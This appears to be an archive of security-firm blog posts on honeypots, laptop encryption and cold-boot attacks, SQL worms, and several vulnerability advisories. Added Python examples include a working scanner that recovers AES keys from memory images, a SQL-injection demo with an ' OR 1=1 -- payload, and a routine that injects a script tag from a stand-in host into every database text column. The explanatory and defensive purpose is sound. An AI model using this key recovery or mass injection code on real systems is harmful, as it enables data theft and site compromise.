Laying the Trap with HoneyPoint Personal Edition & Puppy Linux Live CD

Recently, I have been capturing a good number of attacker probes and malware signatures using a very simple (and cheap) combination of HoneyPoint Personal Edition (HPPE) and a Puppy Linux Live CD. My current setup is an old Gateway 333MHz Pentium laptop from the late 90’s!

The beauty of this installation is that it lets me leverage all of the ease of a Live CD with the power and flexibility of HPPE. It also breathes new usefulness into old machines from our grave yard.

So, here is how it works. I first boot the machine from the Puppy Live CD and configure the network card. From my FTP server (or a USB key) I download the binary for HPPE Linux (available to licensed HPPE users by request), the license and my existing config file. That’s it – run the binary and click Start. Now I am set to trap attack probes and malware to my heart’s content!

It really is pretty easy, and the email alerting now built into HPPE lets me monitor the HoneyPoints remotely from the mail client on my iPhone. This makes a nice, quick way to throw up HoneyPoints without needing a separate console or a centralized monitoring point.

This setup is very useful to me and has even gotten me thinking about adding a plugin interface to HPPE in future releases. That would essentially give you the power to write custom alerting mechanisms and even fingerprinting tools for attacking systems.

Give this setup a try and be sure to let me know your thoughts on HPPE. As always, MSI really wants to hear your ideas, input and feedback on our work.

Thanks for reading and have fun capturing attack data. Some of this stuff is pretty darn cool! 😉

Incident Reporting & Handling WorkFlows

I had an interesting conversation with a client today and they are planning to implement a web site that would give their internal employees a centralized resource for looking up how to report security incidents, building/facilities issues, HR problems, policy violations, etc.

They picture this as a web page with a list of phone numbers, intranet applications and other contact mechanisms for their staff to use to report issues. The conversation was around attempting to create a workflow or flowchart for decision making about how to report an issue and how to decide which contact method to use.

I know a few other organizations have created formal incident reporting procedures for their employees. Would anyone care to share their decision trees or the like for incident handling and user training around this topic (sanitized, of course!)?

Thanks, in advance, for any insight on this. The client will be monitoring the thread and it may help others as well.

Risk Increase in Laptop Loss with Encryption?

There has been a lot of buzz in the last few days about researchers who showed how to retrieve crypto keys from the RAM of stolen laptops: the keys a disk encryption product keeps in memory survive for seconds to minutes after power is removed, long enough to dump them. Several analysts have talked about this raising the risk of data loss from laptop theft and some are even questioning the effectiveness of crypto as a control. I think that much of this is hype and will prove to be overblown in the coming months.

First, the attack has some difficulty and knowledge requirements. This essentially makes it equivalent to a forensic technique and, as such, it is well beyond the capabilities of basic attackers. It requires knowledge deeper than an average computer user or power user would possess. While this does not eliminate the risk, it does significantly reduce the pool of attackers capable of exploiting the vulnerability. Further risk reductions come from understanding that the attacker must gain physical access to the device (what controls are in place for this? what training have you done on laptop loss control?) and that the device must be in a sleep state or recently powered down (have you taught users to power down laptops completely when removing them from the office or other controlled areas?). Each step in training and each additional control further reduces the risk from this vulnerability.
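To make the "knowledge requirement" concrete, here is an added example (my own illustration, not code from the researchers or from MSI) of the core trick the RAM attack relies on: a live AES-128 key leaves its 176-byte expanded key schedule in memory, and those bytes satisfy the FIPS-197 key expansion recurrence, which random memory almost never does. The scanner below walks a memory image byte by byte and reports every offset where the bytes are a valid expansion of their own first 16 bytes. The memory image is constructed (seeded noise with one schedule planted in it) and the planted key is the FIPS-197 Appendix A sample key, not anything recovered from a real machine.

```python
"""Locate AES-128 key schedules in a raw memory image: a live key leaves its
expanded round keys (176 bytes) in RAM, and those bytes satisfy the AES
key-expansion recurrence, which random data almost never does."""
import random

def _gf_mul(a: int, b: int) -> int:
    """Multiply two bytes in GF(2^8) modulo the AES polynomial x^8+x^4+x^3+x+1."""
    product = 0
    for _ in range(8):
        if b & 1:
            product ^= a
        carry = a & 0x80
        a = (a << 1) & 0xFF
        if carry:
            a ^= 0x1B
        b >>= 1
    return product

def _build_sbox() -> list:
    """Derive the S-box (multiplicative inverse, then the affine map) instead of
    hard-coding 256 constants."""
    sbox = [0] * 256
    for x in range(256):
        inv = next((y for y in range(1, 256) if _gf_mul(x, y) == 1), 0)
        s = inv
        for shift in range(1, 5):                           # inv ^ rotl(inv, 1..4)
            s ^= ((inv << shift) | (inv >> (8 - shift))) & 0xFF
        sbox[x] = s ^ 0x63
    return sbox

SBOX = _build_sbox()
RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]
SCHEDULE_LEN = 176                                          # 11 round keys x 16 bytes

def _next_word(prev: bytes, four_back: bytes, i: int) -> bytes:
    """w[i] = w[i-4] ^ f(w[i-1]); f is RotWord+SubWord+Rcon on every 4th word."""
    t = prev
    if i % 4 == 0:
        t = bytes(SBOX[b] for b in t[1:] + t[:1])           # RotWord, then SubWord
        t = bytes([t[0] ^ RCON[i // 4 - 1]]) + t[1:]         # xor the round constant
    return bytes(a ^ b for a, b in zip(four_back, t))

def expand_key_128(key: bytes) -> bytes:
    """FIPS-197 key expansion for a 16-byte key; returns the 176-byte schedule."""
    words = [key[4 * i:4 * i + 4] for i in range(4)]
    for i in range(4, 44):
        words.append(_next_word(words[i - 1], words[i - 4], i))
    return b"".join(words)

def _is_schedule_at(image: bytes, off: int) -> bool:
    """True if image[off:off+176] is the expansion of its own first 16 bytes."""
    words = [image[off + 4 * i:off + 4 * i + 4] for i in range(44)]
    for i in range(4, 44):
        if _next_word(words[i - 1], words[i - 4], i) != words[i]:
            return False                                    # almost every offset dies at w[4]
    return True

def find_aes128_keys(image: bytes) -> list:
    """Scan every byte offset; return (offset, key) for each schedule found."""
    return [(off, image[off:off + 16])
            for off in range(len(image) - SCHEDULE_LEN + 1)
            if _is_schedule_at(image, off)]

# Constructed stand-in for a memory dump: seeded noise with one schedule planted in it.
# The key is the FIPS-197 Appendix A sample key, not one recovered from a real machine.
PLANTED_KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")
PLANTED_OFFSET = 1000

def build_sample_image(size: int = 4096) -> bytes:
    rng = random.Random(1)
    image = bytearray(rng.getrandbits(8) for _ in range(size))
    image[PLANTED_OFFSET:PLANTED_OFFSET + SCHEDULE_LEN] = expand_key_128(PLANTED_KEY)
    return bytes(image)

MEMORY_IMAGE = build_sample_image()

if __name__ == "__main__":
    for off, key in find_aes128_keys(MEMORY_IMAGE):
        print(f"AES-128 key schedule at offset {off:#x}: key {key.hex()}")
```

Two things worth noticing. First, the schedule check is so selective (a wrong candidate fails at w[4] with probability about 1 - 2^-32) that there is no need for any knowledge of which product wrote the key; the same scan works on a dump from any software that keeps an expanded AES key in memory. Second, the published attack went further than this exact match and tolerated the bit decay that sets in once the chips lose power, which is what makes the "recently powered down" condition in the paragraph above matter: the longer the machine has been off, the more of the schedule has rotted and the harder the reconstruction becomes.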

Vendors are also reacting to the problem. Many are reviewing the key management processes in their products and changing them to hold up better against this attack. Their results and effectiveness are likely to vary, but at least many of them are trying.

So, while laptop loss remains a potential data theft risk, even with crypto in place, it is likely to remain a manageable and acceptable risk if proper awareness controls are in place. So before you put too much stock in some of the “near panic” FUD levels some security analysts are shouting, step back, take a look at it from a rational risk standpoint and then identify what you can do about it.

This issue again reinforces that there aren’t any silver bullets in security. Nothing is “absolute protection”, even high level math. The only real way to do security is through proper, rational risk management…

Security Team Leadership Matters

Leading a team of security technicians can be a tough job, but in most corporations the manager of the team must also be an evangelist. Leading a security team often requires that the leader have a vision of the team’s goals and be capable of “selling” that vision both to upper management and to the user base of the entire organization. Since many teams are led by technicians who have ascended through the ranks, their leaders often have a limited understanding of management needs and marketing approaches.

If you are such a security manager, here are a few tips to help you get started. The first one is a quick list of required reading. Leading the team means being a management consultant and an evangelist. To help strengthen or develop these skills, check out a couple of these titles:

The Macintosh Way by Guy Kawasaki – this is the Bible of evangelism from one of the greatest evangelists of the silicon age

The Idea Virus by Seth Godin – this book’s insight is the basis for viral marketing and can be a powerful tool for selling ideas inside of an organization, all of Seth’s work is great and could be helpful

A book about corporate structure and management goals – these are easy to come by and can vary by industry and organization type but a quick Amazon.com search is likely to reveal several that fit the needs

It is essential and critical that security team managers and leaders come up to speed on the needs and goals of management. It should be an immediate goal to learn the style and language of your management team. Only when you can act as a liaison and converse with them on their own terms can you begin the process of “selling” them on the security plan and process. Only when you understand them and have earned their trust can you begin to align security operations with the various lines of business and move further towards adding perceived value to their bottom line.

SQL Worms Continue to Raise Their Ugly Heads

For the last few weeks I have been watching old SQL attacks, worms and probes continue to circulate around the Internet. For a year or so now, I have been fascinated by the life span of old attacks and worms. I have written a couple of articles about how our HoneyPoints continue to capture both Nimda and Code Red worm traffic.

The striking thing about these SQL worms is how much traffic they still generate. According to popular sources like ATLAS, they represent nearly 70% of all malicious traffic on the Internet today. 70% is a large number, especially for vulnerabilities that date back to 2002. Here we are more than 5 years later and these threats are still propagating!

Port UDP/1434 is still the most commonly threatened port according to ATLAS, which I find hard to believe. Our HoneyPoint experience shows that ports 25 and 80 are the most frequently attacked, unless you add in the myriad of Windows RPC noise you get on the Windows SMB and RPC ports. Maybe ATLAS does not include spam or PHP probes in their attack statistics?

While I am unsure of the frequency of global 1434 attacks, it is very true that the traffic is still around. Our HoneyPoints often detect Slammer worm activity and illicit SQL probes from the Internet. These probes originate from all around the world and no particular region seems to emerge as the most common, though we should study these frequency statistics more deeply when time allows.
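As an added example (my own, not HoneyPoint code and not a capture from our sensors), here is the kind of classification a UDP/1434 listener can do to separate legitimate SQL Server Resolution Protocol (SSRP) traffic from the overflow shape Slammer exploits. SSRP requests are tiny: a one-byte opcode, and for the instance lookup (opcode 0x04) an instance name that MC-SQLR caps at 32 characters; the worm sends opcode 0x04 followed by several hundred bytes, which is exactly the unchecked-length bug of MS02-039 (CVE-2002-0649). The decoder bytes and the two ASCII markers used to name a datagram "slammer" are taken from the published Snort signature "MS-SQL Worm propagation attempt" (sid 2003). The sample datagrams are constructed; the "slammer" one only mimics the worm’s structure and carries no shellcode.

```python
"""Classify UDP/1434 datagrams as a honeypot listener would: legitimate SQL
Server Resolution Protocol (SSRP) requests versus the overflow shape that
Slammer (CVE-2002-0649, MS02-039) exploits in the CLNT_UCAST_INST handler."""
import socket

SSRP_INSTANCE_MAX = 32             # MC-SQLR limits INSTANCENAME to 32 characters
SLAMMER_PAYLOAD_LEN = 376          # UDP payload length of the worm datagram
# Decoder bytes (xor ecx, ...) and ASCII markers from the published Snort rule
# "MS-SQL Worm propagation attempt" (sid 2003).
SLAMMER_DECODER = bytes.fromhex("81f10301049b81f101")
SLAMMER_MARKERS = (b"sock", b"send")

def classify_ssrp(payload: bytes) -> str:
    """Return a label for one UDP/1434 payload."""
    if not payload:
        return "empty"
    opcode = payload[0]
    if opcode == 0x02:
        return "ssrp-broadcast-enum"        # CLNT_BCAST_EX: enumerate instances
    if opcode == 0x03:
        return "ssrp-unicast-enum"          # CLNT_UCAST_EX
    if opcode == 0x0F:
        return "ssrp-dac-lookup"            # CLNT_UCAST_DAC
    if opcode == 0x04:                      # CLNT_UCAST_INST: opcode + instance name
        name = payload[1:].split(b"\x00", 1)[0]
        if len(name) <= SSRP_INSTANCE_MAX:
            return "ssrp-instance-lookup"   # well formed: within the protocol's limit
        # Oversized name: the stack overflow shape. Only call it Slammer when the
        # length and the worm's own bytes line up as well.
        if (len(payload) == SLAMMER_PAYLOAD_LEN
                and SLAMMER_DECODER in payload
                and all(m in payload for m in SLAMMER_MARKERS)):
            return "slammer"
        return "ssrp-overflow-attempt"
    return "unknown"

# Constructed sample datagrams (not captures). The "slammer" one only mimics the
# worm's structure: opcode, the long 0x01 run, decoder bytes and markers, padded
# to the worm's length; it carries no shellcode.
SAMPLES = {
    "browse":   b"\x02",
    "lookup":   b"\x04MSSQLSERVER\x00",
    "overflow": b"\x04" + b"A" * 200,
    "slammer":  (b"\x04" + b"\x01" * 96 + SLAMMER_DECODER
                 + b"Wsock" + b"send").ljust(SLAMMER_PAYLOAD_LEN, b"\x90"),
}

def tally(payloads) -> dict:
    """Count labels over an iterable of payloads, e.g. a day's honeypot log."""
    counts = {}
    for p in payloads:
        label = classify_ssrp(p)
        counts[label] = counts.get(label, 0) + 1
    return counts

if __name__ == "__main__":
    # Minimal listener: bind the real port (needs privileges below 1024) and label
    # whatever arrives. It answers nothing; a honeypot's job is to observe.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", 1434))
    while True:
        data, (src, sport) = sock.recvfrom(2048)
        print(f"{src}:{sport} {len(data)}B {classify_ssrp(data)}")
```

The point of keeping "ssrp-overflow-attempt" separate from "slammer" is the question raised above about what else is riding on port 1434: an oversized instance name that is not the worm is a scanner or an exploit framework probing the same bug, and counting those separately is how you would tell the two apart in a week of sensor data.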

But what of targets? How many SQL server instances are still exposed to the raw Internet? Our assessment technicians say they almost never run into one in corporate environments today. I suppose that they still exist in more than a few cable modem or other systems without proper firewalls, but certainly the availability of SQL services to the raw Internet has to have dwindled to almost none. If that is true, then why all the scanning activity?

I have made a few attempts to backtrack hosts that perform the scans and at first blush many show the signs of common bot-net infections. Most are not running exposed SQL themselves, which suggests that the code has been folded into many bot-net exploitation frameworks. Perhaps the bot masters reason that once they infiltrate a commercial network, the SQL exploits will be available and useful to them? My assessment team says this is largely true. Even today, they find blank “sa” passwords and other age old SQL issues inside major corporate clients. So perhaps that is why these old exploits continue to thrive.

In either case, significant efforts should be made to reduce or eliminate these older vulnerabilities and to remove them from our current threats that we face today. So long as we have this noisy attack traffic from the past circulating, it makes it even harder for us to focus on emerging threats and risks that affect our Internet facing systems today. It is simply one more set of alerts, log entries and intrusion deception emails to sort through…

Level One WBR-3460A Wireless Router Telnet Vulnerability

This device presents a telnet prompt on the standard port (23/tcp). This telnet service allows local users to log in without authenticating, which gives them access to the file system, where they can manipulate files or grab the administrator password for the web interface. A fix is in development.

Oracle Prerelease Info, Tivoli Bof

There’s a vulnerability in Oracle Siebel SimBuilder that could allow for remote system compromise. This vulnerability is related to a vulnerability in NCTAudioFile2.dll. The vulnerability affects version 7.8.5 build 2635. Other versions have not been tested, so they may be vulnerable as well. Users should disable the affected ActiveX control. If you are affected by this and would like more information, please feel free to contact us.
Tivoli Storage Manager Express is vulnerable to a heap based buffer overflow. This can be exploited by a malicious user on the network to cause code execution under the SYSTEM user. Versions of the software prior to 5.3.7.3 are affected. Administrators of this software should apply the updates available at ftp://service.boulder.ibm.com/storage/tivoli-storage-management/patches/express/NT/5.3.7.3/
Also, Oracle will be releasing critical patch updates Tuesday, January 15th. Several critical vulnerabilities in database software and application servers are expected to be announced. We will provide more details as they are made available.

SQL Worm, MBR Rootkit

There is a SQL “worm” spreading through the Internet, taking advantage of sites vulnerable to SQL injection attacks. The attack injects JavaScript into all fields in the database; the script attempts to exploit browser flaws on clients that visit the infected website. Web developers should be aware of the increasing attacks using input validation errors as their attack vector.
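As an added example (mine, not MSI’s and not the worm’s actual payload), the following shows the attack in miniature against an in-memory SQLite database: the string-concatenated query that gives the attacker an injection point, the parameterized query that closes it, the catalog-driven update the worm ran once it was in (the real campaign used a cursor over sysobjects/syscolumns on SQL Server; here it is sqlite_master and PRAGMA table_info), and a sweep a site owner could run to find what it left behind. The schema, rows and script tag are all constructed for the example.

```python
"""A mass SQL-injection worm in miniature: the injectable query, its
parameterized fix, the catalog-driven update the worm ran once it had an
injection point, and a sweep that finds what it left behind."""
import sqlite3

# Constructed marker, not the tag any real campaign used.
INJECTED_TAG = '<script src="http://injected.example/bad.js"></script>'

def setup_db() -> sqlite3.Connection:
    """Small in-memory schema standing in for a site database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        CREATE TABLE news     (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A plain widget');
        INSERT INTO products VALUES (2, 'Gadget', 'A gadget');
        INSERT INTO news VALUES (1, 'Welcome', 'First post');
    """)
    return conn

def search_vulnerable(conn, term: str) -> list:
    """String concatenation: the input becomes part of the SQL text."""
    sql = "SELECT id, name FROM products WHERE name = '" + term + "'"
    return conn.execute(sql).fetchall()

def search_fixed(conn, term: str) -> list:
    """Bound parameter: the input is only ever a value, never SQL."""
    return conn.execute("SELECT id, name FROM products WHERE name = ?", (term,)).fetchall()

def text_columns(conn) -> list:
    """(table, column) for every text-typed column, read from the catalog,
    which is how the worm found its targets (sysobjects/syscolumns on SQL
    Server; sqlite_master and PRAGMA table_info here)."""
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'"
    ).fetchall()
    found = []
    for (table,) in tables:
        for _cid, col, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")').fetchall():
            if any(k in (ctype or "").upper() for k in ("CHAR", "TEXT", "CLOB")):
                found.append((table, col))
    return found

def infect_all_text_columns(conn, tag: str) -> int:
    """What the worm did: append the script tag to every text cell.
    Returns the number of row updates performed."""
    touched = 0
    for table, col in text_columns(conn):
        cur = conn.execute(f'UPDATE "{table}" SET "{col}" = "{col}" || ?', (tag,))
        touched += cur.rowcount
    conn.commit()
    return touched

def sweep_for_script_tags(conn) -> list:
    """Cleanup-side check: (table, column, rowid) for every cell holding a <script tag."""
    hits = []
    for table, col in text_columns(conn):
        rows = conn.execute(
            f'SELECT rowid FROM "{table}" WHERE "{col}" LIKE ?', ("%<script%",)
        ).fetchall()
        hits.extend((table, col, rowid) for (rowid,) in rows)
    return hits

if __name__ == "__main__":
    db = setup_db()
    print("injected search returns", search_vulnerable(db, "' OR 1=1 --"))
    print("fixed search returns   ", search_fixed(db, "' OR 1=1 --"))
    print("rows rewritten:", infect_all_text_columns(db, INJECTED_TAG))
    for hit in sweep_for_script_tags(db):
        print("tag found in", hit)
```

One caveat on the simulation: the real attack delivered its UPDATE as a stacked statement tacked onto the injected query, which SQL Server accepts and which sqlite3’s execute() refuses (it runs one statement at a time), so the example calls the update directly rather than through search_vulnerable. The sweep is the part worth keeping: run it against every text column, not just the ones the site displays, because the worm did not know or care which columns were rendered.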

We have received word of a working MBR rootkit that runs on modern systems. This is not a new concept, but it is one that hasn’t had attention for several years. Windows Vista allows users to edit the MBR from userland. An MBR rootkit was discovered in the wild at the end of 2007. Keep an eye on this for more information coming in the future.

Three Examples of Thinking Differently About InfoSec

Today, I am putting my money where my mouth is. I have been talking about thinking differently about infosec as being a powerful tool in the future for several months now, but here are three concrete examples of how security folks need to think differently than they do today. (Note that some of you may have already begun to embrace these ideas – if so, awesome, you are ahead of the curve!)

#1 – Think like attackers AND defenders – We as infosec folks often get so caught up in our statements of ethics, credos and agreements about behavior that we get trapped inside them and become blind to the methods and ways of attackers. Many security folks I meet have taken such steps to distance themselves from attackers, and show such utter disdain for attackers, their tools and their techniques, that they are essentially blind to the way attackers think. This is a dangerous paradox. If you don’t understand your opposition, you have no way of being effective in measuring your defensive capabilities. If you can’t think like an attacker, maneuver like an attacker and understand that they are not bound by the rules that you attempt to impose on them, then you will likely have little success in defending your organization against them. To better defend our assets, we have to be able and willing to understand our enemies. We have to have realistic knowledge of, and the capability to replicate, at the very least, their basic tools, techniques and attitudes. Otherwise, we are simply guessing at their next move. Without insight and understanding, we are playing the “security lottery” in hopes of hitting the big defensive jackpot!

#2 – Deeper defenses are better defenses – We must extend defense in depth beyond an organizational approach to a data-centric approach. The closer to the data the controls are implemented, the more likely they are to be able to add security to the core critical data. (Of course, normal rationality applies here. The controls have to be rational, effective and properly implemented and managed – as always!) This is why security mechanisms like enclaving, data classification and eventually tagging are the future of enterprise security. If we start to think about our security postures, deployments and architectures with these ideas in mind today, we will be able to leverage them in their present state and eventually gain the maximum from them when they are fully ready for integration.

#3 – Think risk, not compliance – I am going to continue to talk about this, no matter how much heat I get from the “compliance guru set”. Striving for compliance with various regulations or standards is striving for the minimum. Guidance, regulations and law are meant to be the MINIMUM BASELINE for the work we need to do to separate liability from negligence. Compliance is a milestone, not a goal. Effective understanding and management of risk is the goal. Don’t be deceived by the “compliance guru set’s” argument that meeting baselines is effective risk management. It is NOT. Regulatory, ISO and PCI compliance pay little attention to, and offer little management for, attacker techniques like vulnerability chaining, the analysis of cascading failures, or zero-day/black swan (Thanks, Alex!) evolutionary capabilities. This step requires upper management education and awareness as well, since those who control the budgets must come to see compliance as a mile marker and not the ribbon at the end of the race!

I hope this helps folks understand more about what I am saying when I assert that in 2008 we have to think differently if we want infosec to improve. Of course, thought has to precede action, but action is also required if we are going to change things. What is clear, from the problems of 2007 and further back, is that what we are doing now is NOT WORKING. It should be very clear to all infosec practitioners that we are losing the race between us and the attackers!

RealPlayer, ClamAV, Nugache

There’s a buffer overflow in RealPlayer 11. We don’t have much detail at this time; however, it is reported that this can be exploited with a maliciously crafted file opened with a vulnerable version. Opening a malicious file will result in the execution of code in the context of the user running the application. The issue is reported in RealPlayer 11; other, untested versions may be vulnerable.

ClamAV version 0.92 contains multiple vulnerabilities. The first is a race condition, where an attacker could create a file with a specific name that a ClamAV function would then operate on. This could allow the attacker to overwrite arbitrary files. The next issue is in the handling of Base64-UUEncoded files. Attackers can craft certain packed files that bypass the scanner itself. The consequences of this should be self evident, and the possibility of it occurring is very real, given the success rate of socially engineered emails and links.

More articles are emerging on the Nugache Trojan. Briefly, the Nugache Trojan is a very sophisticated piece of P2P controlled malware. Using decentralized management, nodes that can attach/detach, and encryption, this malware is a professional job. The authors of these articles seem to feel that the Storm and Nugache authors are the same, or share similar tactics. Once we see a full write up, we’ll post the details.